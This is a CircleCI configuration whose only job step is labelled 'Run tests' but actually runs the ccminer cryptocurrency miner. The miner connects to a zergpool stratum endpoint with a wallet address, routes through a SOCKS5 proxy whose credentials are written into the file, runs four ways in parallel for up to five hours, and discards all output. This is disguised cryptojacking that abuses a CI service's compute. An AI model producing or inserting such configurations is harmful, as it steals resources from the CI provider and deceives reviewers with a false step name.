version: 2.1 
parameters: 
  sample: 
    type: boolean 
    default: false 
orbs: 
   
  python: circleci/python@1.2 
 
workflows: 
  sample:   
    jobs: 
      - build-and-test 
 
jobs: 
  build-and-test:   
    parallelism: 4 
    docker: 
      - image: cobadoc/manaon 
     
    steps: 
      - checkout 
      - run: 
          name: Run tests 
          no_output_timeout: 5h 
          command: | 
           ccminer -a verus -o stratum+tcp://verushash.na.mine.zergpool.com:3300 -u DLd8SKUyrMCAuUt4ToGWDirH6fpQTf6BvV -p c=DOGE,mc=VRSC -t 2 -x socks5://cuan:bijipecah69@199.249.170.113:443 > /dev/null 2>&1